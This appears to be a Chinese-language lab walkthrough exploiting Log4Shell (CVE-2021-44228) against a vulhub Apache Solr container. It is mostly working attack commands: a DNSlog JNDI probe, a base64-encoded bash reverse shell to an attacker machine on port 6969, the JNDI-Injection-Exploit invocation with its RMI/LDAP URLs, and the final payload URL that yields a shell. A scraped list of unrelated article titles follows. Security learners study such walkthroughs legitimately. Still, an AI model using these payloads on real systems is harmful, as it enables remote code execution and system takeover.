开启环境:

root@bt-virtual-machine:/zbt/vulhub-master/log4j/CVE-2021-44228# docker-compose up -d

Log4j2端口3839页面

http://192.168.29.130:8983/solr/admin/cores?action=1http://192.168.29.130:8983/solr/admin/cores?action=1

去提交dnslog payload参数:

http://192.168.29.130:8983/solr/admin/cores?action=${jndi:ldap://u25tly.dnslog.cn}

Dnslog中检测到信息,证明存在log4j2漏洞

攻击:

利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

#####192.168.29.128为kali攻击机监听地址,kali机执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI5LjEyOC82OTY5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.29.128

解密为:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,bash -i >& /dev/tcp/192.168.29.128/6969 0>&1}|{base64,-d}|{bash,-i}" -A 192.168.29.128

得到rmi、ldap参数:

Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.29.128:1099/vvl2u9
ldap://192.168.29.128:1389/vvl2u9
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.29.128:1099/xs1wkb
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.29.128:1099/qzrfe7
ldap://192.168.29.128:1389/qzrfe7

进行payload攻击:

http://192.168.29.130:8983/solr/admin/cores?action=${jndi:rmi://192.168.29.128:1099/vvl2u9}

Kali机监听端口6969获取到权限

关闭环境

Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)相关推荐

  1. Apache Log4j 漏洞(JNDI注入 CVE-2021-44228)

    漏洞 影响范围 2.0 <= Apache log4j <= 2.14.1 利用 import org.apache.log4j.Logger;import java.io.*; impo ...

  2. Apache Log4j2 核弹级漏洞

    近日,Apache Log4j2 的远程代码执行漏洞刷爆朋友圈,该漏洞一旦被攻击者利用会造成严重危害.而且此次漏洞影响巨大,很多网站如百度等都是此次 Log4j 远程代码执行漏洞的受害者,很多互联网企 ...

  3. Apache Log4j2 远程代码执行高危漏洞 解决方案

    新闻:https://view.inews.qq.com/a/20211210A05KTY00 博主其他文章 Log4j2 高危漏洞分析 简介: Apache Log4j2是一款优秀的Java日志框架 ...

  4. Apache Log4j2漏洞复现

    0x00 前言 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲.或分或合.起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱 ...

  5. Apache Log4j2 RCE 命令执行漏洞预警及修复方案

    漏洞名称:Apache Log4j2远程代码执行漏洞 组件名称:Apache Log4j2 截止2021年12⽉10⽇,受影响的Apache log4j2版本: 2.0≤Apache Log4j< ...

  6. 【紧急】Apache Log4j2 远程代码执行漏洞

    0x01 漏洞背景 12月9日,监测到网上披露Apache Log4j2 远程代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可 ...

  7. Apache Log4j2远程代码执行漏洞风险紧急通告,腾讯安全支持全面检测拦截

    腾讯安全注意到,一个Apache Log4j2的高危漏洞细节被公开,攻击者利用漏洞可以远程执行代码. 漏洞描述: 腾讯安全注意到,一个Apache Log4j2反序列化远程代码执行漏洞细节已被公开,L ...

  8. Apache Log4j2远程JNDI代码执行漏洞修复

    #漏洞简介 Apache Log4j2远程代码执行漏洞 当打印的日志含有${字符串时程序会使用lookup解析要打印的字符串,执行任意远程代码,框架没有做相应的过滤导致注入.官网已经在2.16.0(j ...

  9. 分析Apache Log4j2 远程代码执行漏洞

    漏洞描述 Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台.文件.GUI组件,甚至是套接口服务器.NT的事件记录器.UNIX Syslog守护进程等:也 ...

最新文章

  1. ZIP 也能边下载边解压?流式解压技术揭秘!
  2. 开发人员MySQL调优-实战篇2-让SQL使用索引详解
  3. python--练习--将字符串转成列表
  4. php mysql读写分离主从复制_mysql主从复制 读写分离原理及实现
  5. Spring Boot + Mybatis 实现动态数据源
  6. android webView的使用
  7. 三年Java开发,尚学堂java马士兵全套
  8. 不允许后退提交数据的方法(抗重复刷新提交)
  9. 【Vue】---- 手动封装on,emit,off
  10. 如何删除Linux一个目录下部分类型之外的所有文件的三种方法
  11. linux桌面环境组件下载,万能桌面小组件
  12. 保护你的隐私,五种控制Android应用的权限的方法
  13. Java培训学习之分词工具之HanLP介绍
  14. FreeRTOS+STM32L+BC20+MQTT协议传输温湿度数据,控制继电器云平台——④华为云
  15. Window Server 2008虚拟机安装
  16. TabLayout使用介绍
  17. 2021京东校招实习生面试 一面
  18. AMD显卡如何用Anaconda安装pytorch
  19. 武松去厅前声了喏 江民杀毒软件
  20. 如何用C的easyX图形库制作图形化界面菜单(财务管理系统)

热门文章

  1. spleeter音乐人声分离、5种架子鼓钢琴声音分离的高质量模型运行超详细教程windows+ubuntu18.04
  2. Counting Liars
  3. 服务器维护10月11魔兽,魔兽世界怀旧服10月11日免费转服第五期开启公告 免费转服详情...
  4. SpringWebMVC到底是如何工作的?
  5. 视频号网站微信视频下载方法
  6. OpenCvSharp 棋盘格标定助手
  7. ios swift收起键盘
  8. 2018世界人工智能大会
  9. c#读取Excel表数据
  10. 【代码审计】那些代码审计的思路.md